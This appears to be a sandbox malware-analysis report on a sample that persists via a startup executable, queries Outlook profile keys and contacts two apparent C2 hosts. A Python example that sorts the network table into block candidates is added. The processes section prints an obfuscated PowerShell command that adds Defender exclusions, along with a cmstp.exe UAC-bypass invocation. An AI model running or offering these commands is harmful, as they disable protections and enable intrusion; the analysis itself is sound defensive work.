Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
(the row above is recorded 64 times in this detonation, once per process-enumeration event; identical rows collapsed)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

\??\c:\windows\system32\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')

C:\Windows\system32\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 poolfreshstep.com udp
RU 185.170.144.39:80 poolfreshstep.com tcp
US 8.8.8.8:53 39.144.170.185.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 fallback-01-static.com udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 132.145.90.111.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 poolfreshstep.com udp
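The table above mixes three kinds of rows: queries to the sandbox resolver (8.8.8.8), reverse (in-addr.arpa) lookups, and the sample's own TCP connections. Only the last kind is worth blocking, and the reverse lookups are useful mainly to confirm which IPs the sample cares about. The script below, an added example that is not part of the report, reads the rows exactly as printed above (embedded here as constructed input), drops resolver traffic and PTR queries, maps each domain to the ip:port it connected to, and separates the reverse-looked-up IPs into those that also appear as direct destinations and those that do not. It makes no claim about who owns the addresses in the second group.

```python
"""Separate C2 endpoints from resolver and reverse-lookup noise in a sandbox Network table."""
from collections import defaultdict

# Rows copied from the Network section of this report: country, destination, domain, proto.
NETWORK_ROWS = """\
US 8.8.8.8:53 poolfreshstep.com udp
RU 185.170.144.39:80 poolfreshstep.com tcp
US 8.8.8.8:53 39.144.170.185.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 fallback-01-static.com udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 132.145.90.111.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 poolfreshstep.com udp
"""

# The sandbox's DNS resolver; traffic to it says nothing about the sample's infrastructure.
RESOLVERS = {"8.8.8.8"}


def parse_rows(text):
    """Turn the whitespace-separated table into dicts with a split ip/port."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        country, dest, domain, proto = line.split()
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name):
    """'39.144.170.185.in-addr.arpa' -> '185.170.144.39'; None for forward names."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    return ".".join(reversed(name[:-len(suffix)].split(".")))


def c2_endpoints(rows):
    """Map each contacted domain to the ip:port set the sample actually connected to,
    ignoring DNS traffic to the resolver and reverse lookups."""
    out = defaultdict(set)
    for r in rows:
        if r["ip"] in RESOLVERS or ptr_to_ip(r["domain"]):
            continue
        out[r["domain"]].add(f"{r['ip']}:{r['port']}")
    return dict(out)


def reverse_lookups(rows):
    """Split reverse-looked-up IPs by whether they are also direct destinations."""
    direct = {r["ip"] for r in rows if r["ip"] not in RESOLVERS}
    looked_up = {ptr_to_ip(r["domain"]) for r in rows} - {None}
    return {"c2": sorted(looked_up & direct), "other": sorted(looked_up - direct)}


if __name__ == "__main__":
    rows = parse_rows(NETWORK_ROWS)
    print(c2_endpoints(rows))
    print(reverse_lookups(rows))
```

Run as is it yields two blockable endpoints, poolfreshstep.com at 185.170.144.39:80 and fallback-01-static.com at 111.90.145.132:7708, and shows that both of those IPs were also looked up in reverse by the sample; the remaining seven PTR queries have no matching connection in this capture and should not be treated as indicators without further evidence.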

Files

memory/4760-0-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp

memory/4760-1-0x0000000000C60000-0x0000000000C6C000-memory.dmp

memory/4760-2-0x000000001B7C0000-0x000000001B836000-memory.dmp

memory/4760-3-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/4760-4-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp

memory/4760-5-0x0000000002FC0000-0x0000000002FDE000-memory.dmp

memory/4760-6-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/4760-7-0x000000001BA90000-0x000000001BB70000-memory.dmp

memory/4760-10-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

C:\Users\Admin\A.inf

MD5 961df7710c27cd2a2452c11aa48ada24
SHA1 081694e0067918b8355efef2cf72ef52d82e44b0
SHA256 d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41
SHA512 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uajcztiv.2ns.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4760-20-0x000000001B950000-0x000000001B972000-memory.dmp

memory/4760-21-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/4760-35-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

MD5 d00a8f6a66f5fcaf18564b6f47831294
SHA1 d1ae07fd6267b53264f1764cc45aafbfe9f5f763
SHA256 a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039
SHA512 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27

memory/4760-48-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/656-49-0x0000000000B60000-0x0000000000BD0000-memory.dmp

memory/656-50-0x0000000005480000-0x000000000551C000-memory.dmp

memory/656-72-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-78-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-114-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-112-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-110-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-106-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-104-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-102-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-96-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-94-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-92-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-90-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-88-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-84-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-82-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-80-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-76-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-74-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-70-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-68-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-66-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-64-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-60-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-58-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-108-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-100-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-98-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-86-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-63-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-56-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-54-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-52-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-51-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-2905-0x0000000005630000-0x000000000565C000-memory.dmp

memory/656-2906-0x0000000005660000-0x00000000056AC000-memory.dmp

memory/656-2907-0x0000000005A30000-0x0000000005B20000-memory.dmp

memory/656-7876-0x0000000005B90000-0x0000000005BF6000-memory.dmp

memory/656-7877-0x00000000065B0000-0x0000000006B54000-memory.dmp

memory/656-7878-0x00000000060E0000-0x0000000006172000-memory.dmp

memory/656-7879-0x0000000006CE0000-0x0000000006CF2000-memory.dmp

memory/656-7880-0x0000000006DF0000-0x0000000006E40000-memory.dmp